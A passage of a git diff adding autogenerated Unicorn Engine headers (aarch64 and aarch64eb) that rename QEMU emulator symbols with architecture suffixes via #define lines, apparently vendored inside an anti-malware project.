+#define tcg_out_modrm_offset tcg_out_modrm_offset_aarch64 +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_aarch64 +#define tcg_out_mov tcg_out_mov_aarch64 +#define tcg_out_movcond32 tcg_out_movcond32_aarch64 +#define tcg_out_movcond64 tcg_out_movcond64_aarch64 +#define tcg_out_movi tcg_out_movi_aarch64 +#define tcg_out_op tcg_out_op_aarch64 +#define tcg_out_pop tcg_out_pop_aarch64 +#define tcg_out_push tcg_out_push_aarch64 +#define tcg_out_qemu_ld tcg_out_qemu_ld_aarch64 +#define tcg_out_qemu_ld_direct 
tcg_out_qemu_ld_direct_aarch64 +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_aarch64 +#define tcg_out_qemu_st tcg_out_qemu_st_aarch64 +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_aarch64 +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_aarch64 +#define tcg_out_reloc tcg_out_reloc_aarch64 +#define tcg_out_rolw_8 tcg_out_rolw_8_aarch64 +#define tcg_out_setcond32 tcg_out_setcond32_aarch64 +#define tcg_out_setcond64 tcg_out_setcond64_aarch64 +#define tcg_out_shifti tcg_out_shifti_aarch64 +#define tcg_out_st tcg_out_st_aarch64 +#define tcg_out_tb_finalize tcg_out_tb_finalize_aarch64 +#define tcg_out_tb_init tcg_out_tb_init_aarch64 +#define tcg_out_tlb_load tcg_out_tlb_load_aarch64 +#define tcg_out_vex_modrm tcg_out_vex_modrm_aarch64 +#define tcg_patch32 tcg_patch32_aarch64 +#define tcg_patch8 tcg_patch8_aarch64 +#define tcg_pcrel_diff tcg_pcrel_diff_aarch64 +#define tcg_pool_reset tcg_pool_reset_aarch64 +#define tcg_prologue_init tcg_prologue_init_aarch64 +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_aarch64 +#define tcg_reg_alloc tcg_reg_alloc_aarch64 +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_aarch64 +#define tcg_reg_alloc_call tcg_reg_alloc_call_aarch64 +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_aarch64 +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_aarch64 +#define tcg_reg_alloc_op tcg_reg_alloc_op_aarch64 +#define tcg_reg_alloc_start tcg_reg_alloc_start_aarch64 +#define tcg_reg_free tcg_reg_free_aarch64 +#define tcg_reg_sync tcg_reg_sync_aarch64 +#define tcg_set_frame tcg_set_frame_aarch64 +#define tcg_set_nop tcg_set_nop_aarch64 +#define tcg_swap_cond tcg_swap_cond_aarch64 +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_aarch64 +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_aarch64 +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_aarch64 +#define tcg_target_const_match tcg_target_const_match_aarch64 +#define tcg_target_init tcg_target_init_aarch64 +#define 
tcg_target_qemu_prologue tcg_target_qemu_prologue_aarch64 +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_aarch64 +#define tcg_temp_alloc tcg_temp_alloc_aarch64 +#define tcg_temp_free_i32 tcg_temp_free_i32_aarch64 +#define tcg_temp_free_i64 tcg_temp_free_i64_aarch64 +#define tcg_temp_free_internal tcg_temp_free_internal_aarch64 +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_aarch64 +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_aarch64 +#define tcg_temp_new_i32 tcg_temp_new_i32_aarch64 +#define tcg_temp_new_i64 tcg_temp_new_i64_aarch64 +#define tcg_temp_new_internal tcg_temp_new_internal_aarch64 +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_aarch64 +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_aarch64 +#define tdb_hash tdb_hash_aarch64 +#define teecr_write teecr_write_aarch64 +#define teehbr_access teehbr_access_aarch64 +#define temp_allocate_frame temp_allocate_frame_aarch64 +#define temp_dead temp_dead_aarch64 +#define temps_are_copies temps_are_copies_aarch64 +#define temp_save temp_save_aarch64 +#define temp_sync temp_sync_aarch64 +#define tgen_arithi tgen_arithi_aarch64 +#define tgen_arithr tgen_arithr_aarch64 +#define thumb2_logic_op thumb2_logic_op_aarch64 +#define ti925t_initfn ti925t_initfn_aarch64 +#define tlb_add_large_page tlb_add_large_page_aarch64 +#define tlb_flush_entry tlb_flush_entry_aarch64 +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_aarch64 +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_aarch64 +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_aarch64 +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_aarch64 +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_aarch64 +#define tlbi_aa64_va_write tlbi_aa64_va_write_aarch64 +#define tlbiall_is_write tlbiall_is_write_aarch64 +#define tlbiall_write tlbiall_write_aarch64 +#define tlbiasid_is_write tlbiasid_is_write_aarch64 +#define tlbiasid_write tlbiasid_write_aarch64 +#define tlbimvaa_is_write 
tlbimvaa_is_write_aarch64 +#define tlbimvaa_write tlbimvaa_write_aarch64 +#define tlbimva_is_write tlbimva_is_write_aarch64 +#define tlbimva_write tlbimva_write_aarch64 +#define tlb_is_dirty_ram tlb_is_dirty_ram_aarch64 +#define tlb_protect_code tlb_protect_code_aarch64 +#define tlb_reset_dirty_range tlb_reset_dirty_range_aarch64 +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_aarch64 +#define tlb_set_dirty tlb_set_dirty_aarch64 +#define tlb_set_dirty1 tlb_set_dirty1_aarch64 +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_aarch64 +#define tlb_vaddr_to_host tlb_vaddr_to_host_aarch64 +#define token_get_type token_get_type_aarch64 +#define token_get_value token_get_value_aarch64 +#define token_is_escape token_is_escape_aarch64 +#define token_is_keyword token_is_keyword_aarch64 +#define token_is_operator token_is_operator_aarch64 +#define tokens_append_from_iter tokens_append_from_iter_aarch64 +#define to_qiv to_qiv_aarch64 +#define to_qov to_qov_aarch64 +#define tosa_init tosa_init_aarch64 +#define tosa_machine_init tosa_machine_init_aarch64 +#define tswap32 tswap32_aarch64 +#define tswap64 tswap64_aarch64 +#define type_class_get_size type_class_get_size_aarch64 +#define type_get_by_name type_get_by_name_aarch64 +#define type_get_parent type_get_parent_aarch64 +#define type_has_parent type_has_parent_aarch64 +#define type_initialize type_initialize_aarch64 +#define type_initialize_interface type_initialize_interface_aarch64 +#define type_is_ancestor type_is_ancestor_aarch64 +#define type_new type_new_aarch64 +#define type_object_get_size type_object_get_size_aarch64 +#define type_register_internal type_register_internal_aarch64 +#define type_table_add type_table_add_aarch64 +#define type_table_get type_table_get_aarch64 +#define type_table_lookup type_table_lookup_aarch64 +#define uint16_to_float32 uint16_to_float32_aarch64 +#define uint16_to_float64 uint16_to_float64_aarch64 +#define uint32_to_float32 uint32_to_float32_aarch64 +#define 
uint32_to_float64 uint32_to_float64_aarch64 +#define uint64_to_float128 uint64_to_float128_aarch64 +#define uint64_to_float32 uint64_to_float32_aarch64 +#define uint64_to_float64 uint64_to_float64_aarch64 +#define unassigned_io_ops unassigned_io_ops_aarch64 +#define unassigned_io_read unassigned_io_read_aarch64 +#define unassigned_io_write unassigned_io_write_aarch64 +#define unassigned_mem_accepts unassigned_mem_accepts_aarch64 +#define unassigned_mem_ops unassigned_mem_ops_aarch64 +#define unassigned_mem_read unassigned_mem_read_aarch64 +#define unassigned_mem_write unassigned_mem_write_aarch64 +#define update_spsel update_spsel_aarch64 +#define v6_cp_reginfo v6_cp_reginfo_aarch64 +#define v6k_cp_reginfo v6k_cp_reginfo_aarch64 +#define v7_cp_reginfo v7_cp_reginfo_aarch64 +#define v7mp_cp_reginfo v7mp_cp_reginfo_aarch64 +#define v7m_pop v7m_pop_aarch64 +#define v7m_push v7m_push_aarch64 +#define v8_cp_reginfo v8_cp_reginfo_aarch64 +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_aarch64 +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_aarch64 +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_aarch64 +#define vapa_cp_reginfo vapa_cp_reginfo_aarch64 +#define vbar_write vbar_write_aarch64 +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_aarch64 +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_aarch64 +#define vfp_get_fpcr vfp_get_fpcr_aarch64 +#define vfp_get_fpscr vfp_get_fpscr_aarch64 +#define vfp_get_fpsr vfp_get_fpsr_aarch64 +#define vfp_reg_offset vfp_reg_offset_aarch64 +#define vfp_set_fpcr vfp_set_fpcr_aarch64 +#define vfp_set_fpscr vfp_set_fpscr_aarch64 +#define vfp_set_fpsr vfp_set_fpsr_aarch64 +#define visit_end_implicit_struct visit_end_implicit_struct_aarch64 +#define visit_end_list visit_end_list_aarch64 +#define visit_end_struct visit_end_struct_aarch64 +#define visit_end_union visit_end_union_aarch64 +#define visit_get_next_type visit_get_next_type_aarch64 +#define visit_next_list visit_next_list_aarch64 +#define visit_optional 
visit_optional_aarch64 +#define visit_start_implicit_struct visit_start_implicit_struct_aarch64 +#define visit_start_list visit_start_list_aarch64 +#define visit_start_struct visit_start_struct_aarch64 +#define visit_start_union visit_start_union_aarch64 +#define vmsa_cp_reginfo vmsa_cp_reginfo_aarch64 +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_aarch64 +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_aarch64 +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_aarch64 +#define vmsa_ttbcr_write vmsa_ttbcr_write_aarch64 +#define vmsa_ttbr_write vmsa_ttbr_write_aarch64 +#define write_cpustate_to_list write_cpustate_to_list_aarch64 +#define write_list_to_cpustate write_list_to_cpustate_aarch64 +#define write_raw_cp_reg write_raw_cp_reg_aarch64 +#define X86CPURegister32_lookup X86CPURegister32_lookup_aarch64 +#define x86_op_defs x86_op_defs_aarch64 +#define xpsr_read xpsr_read_aarch64 +#define xpsr_write xpsr_write_aarch64 +#define xscale_cpar_write xscale_cpar_write_aarch64 +#define xscale_cp_reginfo xscale_cp_reginfo_aarch64 +#define ARM64_REGS_STORAGE_SIZE ARM64_REGS_STORAGE_SIZE_aarch64 +#define arm64_release arm64_release_aarch64 +#define arm64_reg_reset arm64_reg_reset_aarch64 +#define arm64_reg_read arm64_reg_read_aarch64 +#define arm64_reg_write arm64_reg_write_aarch64 +#define gen_a64_set_pc_im gen_a64_set_pc_im_aarch64 +#define aarch64_cpu_register_types aarch64_cpu_register_types_aarch64 +#define helper_udiv64 helper_udiv64_aarch64 +#define helper_sdiv64 helper_sdiv64_aarch64 +#define helper_cls64 helper_cls64_aarch64 +#define helper_cls32 helper_cls32_aarch64 +#define helper_rbit64 helper_rbit64_aarch64 +#define helper_vfp_cmps_a64 helper_vfp_cmps_a64_aarch64 +#define helper_vfp_cmpes_a64 helper_vfp_cmpes_a64_aarch64 +#define helper_vfp_cmpd_a64 helper_vfp_cmpd_a64_aarch64 +#define helper_vfp_cmped_a64 helper_vfp_cmped_a64_aarch64 +#define helper_vfp_mulxs helper_vfp_mulxs_aarch64 +#define helper_vfp_mulxd helper_vfp_mulxd_aarch64 +#define helper_simd_tbl 
helper_simd_tbl_aarch64 +#define helper_neon_ceq_f64 helper_neon_ceq_f64_aarch64 +#define helper_neon_cge_f64 helper_neon_cge_f64_aarch64 +#define helper_neon_cgt_f64 helper_neon_cgt_f64_aarch64 +#define helper_recpsf_f32 helper_recpsf_f32_aarch64 +#define helper_recpsf_f64 helper_recpsf_f64_aarch64 +#define helper_rsqrtsf_f32 helper_rsqrtsf_f32_aarch64 +#define helper_rsqrtsf_f64 helper_rsqrtsf_f64_aarch64 +#define helper_neon_addlp_s8 helper_neon_addlp_s8_aarch64 +#define helper_neon_addlp_u8 helper_neon_addlp_u8_aarch64 +#define helper_neon_addlp_s16 helper_neon_addlp_s16_aarch64 +#define helper_neon_addlp_u16 helper_neon_addlp_u16_aarch64 +#define helper_frecpx_f32 helper_frecpx_f32_aarch64 +#define helper_frecpx_f64 helper_frecpx_f64_aarch64 +#define helper_fcvtx_f64_to_f32 helper_fcvtx_f64_to_f32_aarch64 +#define helper_crc32_64 helper_crc32_64_aarch64 +#define helper_crc32c_64 helper_crc32c_64_aarch64 +#define aarch64_cpu_do_interrupt aarch64_cpu_do_interrupt_aarch64 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64eb.h b/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64eb.h new file mode 100644 index 0000000..fbdb37a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64eb.h @@ -0,0 +1,3056 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_AARCH64EB_H +#define UNICORN_AUTOGEN_AARCH64EB_H +#define arm_release arm_release_aarch64eb +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_aarch64eb +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_aarch64eb +#define use_idiv_instructions_rt use_idiv_instructions_rt_aarch64eb +#define tcg_target_deposit_valid tcg_target_deposit_valid_aarch64eb +#define helper_power_down helper_power_down_aarch64eb +#define check_exit_request check_exit_request_aarch64eb +#define address_space_unregister address_space_unregister_aarch64eb +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_aarch64eb +#define phys_mem_clean 
phys_mem_clean_aarch64eb +#define tb_cleanup tb_cleanup_aarch64eb +#define memory_map memory_map_aarch64eb +#define memory_map_ptr memory_map_ptr_aarch64eb +#define memory_unmap memory_unmap_aarch64eb +#define memory_free memory_free_aarch64eb +#define free_code_gen_buffer free_code_gen_buffer_aarch64eb +#define helper_raise_exception helper_raise_exception_aarch64eb +#define tcg_enabled tcg_enabled_aarch64eb +#define tcg_exec_init tcg_exec_init_aarch64eb +#define memory_register_types memory_register_types_aarch64eb +#define cpu_exec_init_all cpu_exec_init_all_aarch64eb +#define vm_start vm_start_aarch64eb +#define resume_all_vcpus resume_all_vcpus_aarch64eb +#define a15_l2ctlr_read a15_l2ctlr_read_aarch64eb +#define a64_translate_init a64_translate_init_aarch64eb +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_aarch64eb +#define aa64_cacheop_access aa64_cacheop_access_aarch64eb +#define aa64_daif_access aa64_daif_access_aarch64eb +#define aa64_daif_write aa64_daif_write_aarch64eb +#define aa64_dczid_read aa64_dczid_read_aarch64eb +#define aa64_fpcr_read aa64_fpcr_read_aarch64eb +#define aa64_fpcr_write aa64_fpcr_write_aarch64eb +#define aa64_fpsr_read aa64_fpsr_read_aarch64eb +#define aa64_fpsr_write aa64_fpsr_write_aarch64eb +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_aarch64eb +#define aa64_zva_access aa64_zva_access_aarch64eb +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_aarch64eb +#define aarch64_restore_sp aarch64_restore_sp_aarch64eb +#define aarch64_save_sp aarch64_save_sp_aarch64eb +#define accel_find accel_find_aarch64eb +#define accel_init_machine accel_init_machine_aarch64eb +#define accel_type accel_type_aarch64eb +#define access_with_adjusted_size access_with_adjusted_size_aarch64eb +#define add128 add128_aarch64eb +#define add16_sat add16_sat_aarch64eb +#define add16_usat add16_usat_aarch64eb +#define add192 add192_aarch64eb +#define add8_sat add8_sat_aarch64eb +#define add8_usat 
add8_usat_aarch64eb +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_aarch64eb +#define add_cpreg_to_list add_cpreg_to_list_aarch64eb +#define addFloat128Sigs addFloat128Sigs_aarch64eb +#define addFloat32Sigs addFloat32Sigs_aarch64eb +#define addFloat64Sigs addFloat64Sigs_aarch64eb +#define addFloatx80Sigs addFloatx80Sigs_aarch64eb +#define add_qemu_ldst_label add_qemu_ldst_label_aarch64eb +#define address_space_access_valid address_space_access_valid_aarch64eb +#define address_space_destroy address_space_destroy_aarch64eb +#define address_space_destroy_dispatch address_space_destroy_dispatch_aarch64eb +#define address_space_get_flatview address_space_get_flatview_aarch64eb +#define address_space_init address_space_init_aarch64eb +#define address_space_init_dispatch address_space_init_dispatch_aarch64eb +#define address_space_lookup_region address_space_lookup_region_aarch64eb +#define address_space_map address_space_map_aarch64eb +#define address_space_read address_space_read_aarch64eb +#define address_space_rw address_space_rw_aarch64eb +#define address_space_translate address_space_translate_aarch64eb +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_aarch64eb +#define address_space_translate_internal address_space_translate_internal_aarch64eb +#define address_space_unmap address_space_unmap_aarch64eb +#define address_space_update_topology address_space_update_topology_aarch64eb +#define address_space_update_topology_pass address_space_update_topology_pass_aarch64eb +#define address_space_write address_space_write_aarch64eb +#define addrrange_contains addrrange_contains_aarch64eb +#define addrrange_end addrrange_end_aarch64eb +#define addrrange_equal addrrange_equal_aarch64eb +#define addrrange_intersection addrrange_intersection_aarch64eb +#define addrrange_intersects addrrange_intersects_aarch64eb +#define addrrange_make addrrange_make_aarch64eb +#define adjust_endianness adjust_endianness_aarch64eb +#define all_helpers 
all_helpers_aarch64eb +#define alloc_code_gen_buffer alloc_code_gen_buffer_aarch64eb +#define alloc_entry alloc_entry_aarch64eb +#define always_true always_true_aarch64eb +#define arm1026_initfn arm1026_initfn_aarch64eb +#define arm1136_initfn arm1136_initfn_aarch64eb +#define arm1136_r2_initfn arm1136_r2_initfn_aarch64eb +#define arm1176_initfn arm1176_initfn_aarch64eb +#define arm11mpcore_initfn arm11mpcore_initfn_aarch64eb +#define arm926_initfn arm926_initfn_aarch64eb +#define arm946_initfn arm946_initfn_aarch64eb +#define arm_ccnt_enabled arm_ccnt_enabled_aarch64eb +#define arm_cp_read_zero arm_cp_read_zero_aarch64eb +#define arm_cp_reset_ignore arm_cp_reset_ignore_aarch64eb +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_aarch64eb +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_aarch64eb +#define arm_cpu_finalizefn arm_cpu_finalizefn_aarch64eb +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_aarch64eb +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_aarch64eb +#define arm_cpu_initfn arm_cpu_initfn_aarch64eb +#define arm_cpu_list arm_cpu_list_aarch64eb +#define cpu_loop_exit cpu_loop_exit_aarch64eb +#define arm_cpu_post_init arm_cpu_post_init_aarch64eb +#define arm_cpu_realizefn arm_cpu_realizefn_aarch64eb +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_aarch64eb +#define arm_cpu_register_types arm_cpu_register_types_aarch64eb +#define cpu_resume_from_signal cpu_resume_from_signal_aarch64eb +#define arm_cpus arm_cpus_aarch64eb +#define arm_cpu_set_pc arm_cpu_set_pc_aarch64eb +#define arm_cp_write_ignore arm_cp_write_ignore_aarch64eb +#define arm_current_el arm_current_el_aarch64eb +#define arm_dc_feature arm_dc_feature_aarch64eb +#define arm_debug_excp_handler arm_debug_excp_handler_aarch64eb +#define arm_debug_target_el arm_debug_target_el_aarch64eb +#define arm_el_is_aa64 arm_el_is_aa64_aarch64eb +#define arm_env_get_cpu arm_env_get_cpu_aarch64eb +#define arm_excp_target_el 
arm_excp_target_el_aarch64eb +#define arm_excp_unmasked arm_excp_unmasked_aarch64eb +#define arm_feature arm_feature_aarch64eb +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_aarch64eb +#define gen_intermediate_code gen_intermediate_code_aarch64eb +#define gen_intermediate_code_pc gen_intermediate_code_pc_aarch64eb +#define arm_gen_test_cc arm_gen_test_cc_aarch64eb +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_aarch64eb +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_aarch64eb +#define arm_handle_psci_call arm_handle_psci_call_aarch64eb +#define arm_is_psci_call arm_is_psci_call_aarch64eb +#define arm_is_secure arm_is_secure_aarch64eb +#define arm_is_secure_below_el3 arm_is_secure_below_el3_aarch64eb +#define arm_ldl_code arm_ldl_code_aarch64eb +#define arm_lduw_code arm_lduw_code_aarch64eb +#define arm_log_exception arm_log_exception_aarch64eb +#define arm_reg_read arm_reg_read_aarch64eb +#define arm_reg_reset arm_reg_reset_aarch64eb +#define arm_reg_write arm_reg_write_aarch64eb +#define restore_state_to_opc restore_state_to_opc_aarch64eb +#define arm_rmode_to_sf arm_rmode_to_sf_aarch64eb +#define arm_singlestep_active arm_singlestep_active_aarch64eb +#define tlb_fill tlb_fill_aarch64eb +#define tlb_flush tlb_flush_aarch64eb +#define tlb_flush_page tlb_flush_page_aarch64eb +#define tlb_set_page tlb_set_page_aarch64eb +#define arm_translate_init arm_translate_init_aarch64eb +#define arm_v7m_class_init arm_v7m_class_init_aarch64eb +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_aarch64eb +#define ats_access ats_access_aarch64eb +#define ats_write ats_write_aarch64eb +#define bad_mode_switch bad_mode_switch_aarch64eb +#define bank_number bank_number_aarch64eb +#define bitmap_zero_extend bitmap_zero_extend_aarch64eb +#define bp_wp_matches bp_wp_matches_aarch64eb +#define breakpoint_invalidate breakpoint_invalidate_aarch64eb +#define build_page_bitmap build_page_bitmap_aarch64eb +#define bus_add_child bus_add_child_aarch64eb +#define 
bus_class_init bus_class_init_aarch64eb +#define bus_info bus_info_aarch64eb +#define bus_unparent bus_unparent_aarch64eb +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_aarch64eb +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_aarch64eb +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_aarch64eb +#define call_recip_estimate call_recip_estimate_aarch64eb +#define can_merge can_merge_aarch64eb +#define capacity_increase capacity_increase_aarch64eb +#define ccsidr_read ccsidr_read_aarch64eb +#define check_ap check_ap_aarch64eb +#define check_breakpoints check_breakpoints_aarch64eb +#define check_watchpoints check_watchpoints_aarch64eb +#define cho cho_aarch64eb +#define clear_bit clear_bit_aarch64eb +#define clz32 clz32_aarch64eb +#define clz64 clz64_aarch64eb +#define cmp_flatrange_addr cmp_flatrange_addr_aarch64eb +#define code_gen_alloc code_gen_alloc_aarch64eb +#define commonNaNToFloat128 commonNaNToFloat128_aarch64eb +#define commonNaNToFloat16 commonNaNToFloat16_aarch64eb +#define commonNaNToFloat32 commonNaNToFloat32_aarch64eb +#define commonNaNToFloat64 commonNaNToFloat64_aarch64eb +#define commonNaNToFloatx80 commonNaNToFloatx80_aarch64eb +#define compute_abs_deadline compute_abs_deadline_aarch64eb +#define cond_name cond_name_aarch64eb +#define configure_accelerator configure_accelerator_aarch64eb +#define container_get container_get_aarch64eb +#define container_info container_info_aarch64eb +#define container_register_types container_register_types_aarch64eb +#define contextidr_write contextidr_write_aarch64eb +#define core_log_global_start core_log_global_start_aarch64eb +#define core_log_global_stop core_log_global_stop_aarch64eb +#define core_memory_listener core_memory_listener_aarch64eb +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_aarch64eb +#define cortex_a15_initfn cortex_a15_initfn_aarch64eb +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_aarch64eb +#define cortex_a8_initfn 
cortex_a8_initfn_aarch64eb +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_aarch64eb +#define cortex_a9_initfn cortex_a9_initfn_aarch64eb +#define cortex_m3_initfn cortex_m3_initfn_aarch64eb +#define count_cpreg count_cpreg_aarch64eb +#define countLeadingZeros32 countLeadingZeros32_aarch64eb +#define countLeadingZeros64 countLeadingZeros64_aarch64eb +#define cp_access_ok cp_access_ok_aarch64eb +#define cpacr_write cpacr_write_aarch64eb +#define cpreg_field_is_64bit cpreg_field_is_64bit_aarch64eb +#define cp_reginfo cp_reginfo_aarch64eb +#define cpreg_key_compare cpreg_key_compare_aarch64eb +#define cpreg_make_keylist cpreg_make_keylist_aarch64eb +#define cp_reg_reset cp_reg_reset_aarch64eb +#define cpreg_to_kvm_id cpreg_to_kvm_id_aarch64eb +#define cpsr_read cpsr_read_aarch64eb +#define cpsr_write cpsr_write_aarch64eb +#define cptype_valid cptype_valid_aarch64eb +#define cpu_abort cpu_abort_aarch64eb +#define cpu_arm_exec cpu_arm_exec_aarch64eb +#define cpu_arm_gen_code cpu_arm_gen_code_aarch64eb +#define cpu_arm_init cpu_arm_init_aarch64eb +#define cpu_breakpoint_insert cpu_breakpoint_insert_aarch64eb +#define cpu_breakpoint_remove cpu_breakpoint_remove_aarch64eb +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_aarch64eb +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_aarch64eb +#define cpu_can_do_io cpu_can_do_io_aarch64eb +#define cpu_can_run cpu_can_run_aarch64eb +#define cpu_class_init cpu_class_init_aarch64eb +#define cpu_common_class_by_name cpu_common_class_by_name_aarch64eb +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_aarch64eb +#define cpu_common_get_arch_id cpu_common_get_arch_id_aarch64eb +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_aarch64eb +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_aarch64eb +#define cpu_common_has_work cpu_common_has_work_aarch64eb +#define cpu_common_initfn cpu_common_initfn_aarch64eb +#define cpu_common_noop cpu_common_noop_aarch64eb 
+#define cpu_common_parse_features cpu_common_parse_features_aarch64eb +#define cpu_common_realizefn cpu_common_realizefn_aarch64eb +#define cpu_common_reset cpu_common_reset_aarch64eb +#define cpu_dump_statistics cpu_dump_statistics_aarch64eb +#define cpu_exec_init cpu_exec_init_aarch64eb +#define cpu_flush_icache_range cpu_flush_icache_range_aarch64eb +#define cpu_gen_init cpu_gen_init_aarch64eb +#define cpu_get_clock cpu_get_clock_aarch64eb +#define cpu_get_real_ticks cpu_get_real_ticks_aarch64eb +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_aarch64eb +#define cpu_handle_debug_exception cpu_handle_debug_exception_aarch64eb +#define cpu_handle_guest_debug cpu_handle_guest_debug_aarch64eb +#define cpu_inb cpu_inb_aarch64eb +#define cpu_inl cpu_inl_aarch64eb +#define cpu_interrupt cpu_interrupt_aarch64eb +#define cpu_interrupt_handler cpu_interrupt_handler_aarch64eb +#define cpu_inw cpu_inw_aarch64eb +#define cpu_io_recompile cpu_io_recompile_aarch64eb +#define cpu_is_stopped cpu_is_stopped_aarch64eb +#define cpu_ldl_code cpu_ldl_code_aarch64eb +#define cpu_ldub_code cpu_ldub_code_aarch64eb +#define cpu_lduw_code cpu_lduw_code_aarch64eb +#define cpu_memory_rw_debug cpu_memory_rw_debug_aarch64eb +#define cpu_mmu_index cpu_mmu_index_aarch64eb +#define cpu_outb cpu_outb_aarch64eb +#define cpu_outl cpu_outl_aarch64eb +#define cpu_outw cpu_outw_aarch64eb +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_aarch64eb +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_aarch64eb +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_aarch64eb +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_aarch64eb +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_aarch64eb +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_aarch64eb +#define cpu_physical_memory_map cpu_physical_memory_map_aarch64eb +#define cpu_physical_memory_range_includes_clean 
cpu_physical_memory_range_includes_clean_aarch64eb +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_aarch64eb +#define cpu_physical_memory_rw cpu_physical_memory_rw_aarch64eb +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_aarch64eb +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_aarch64eb +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_aarch64eb +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_aarch64eb +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_aarch64eb +#define cpu_register cpu_register_aarch64eb +#define cpu_register_types cpu_register_types_aarch64eb +#define cpu_restore_state cpu_restore_state_aarch64eb +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_aarch64eb +#define cpu_single_step cpu_single_step_aarch64eb +#define cpu_tb_exec cpu_tb_exec_aarch64eb +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_aarch64eb +#define cpu_to_be64 cpu_to_be64_aarch64eb +#define cpu_to_le32 cpu_to_le32_aarch64eb +#define cpu_to_le64 cpu_to_le64_aarch64eb +#define cpu_type_info cpu_type_info_aarch64eb +#define cpu_unassigned_access cpu_unassigned_access_aarch64eb +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_aarch64eb +#define cpu_watchpoint_insert cpu_watchpoint_insert_aarch64eb +#define cpu_watchpoint_remove cpu_watchpoint_remove_aarch64eb +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_aarch64eb +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_aarch64eb +#define crc32c_table crc32c_table_aarch64eb +#define create_new_memory_mapping create_new_memory_mapping_aarch64eb +#define csselr_write csselr_write_aarch64eb +#define cto32 cto32_aarch64eb +#define ctr_el0_access ctr_el0_access_aarch64eb +#define ctz32 ctz32_aarch64eb +#define ctz64 ctz64_aarch64eb +#define dacr_write dacr_write_aarch64eb +#define dbgbcr_write dbgbcr_write_aarch64eb 
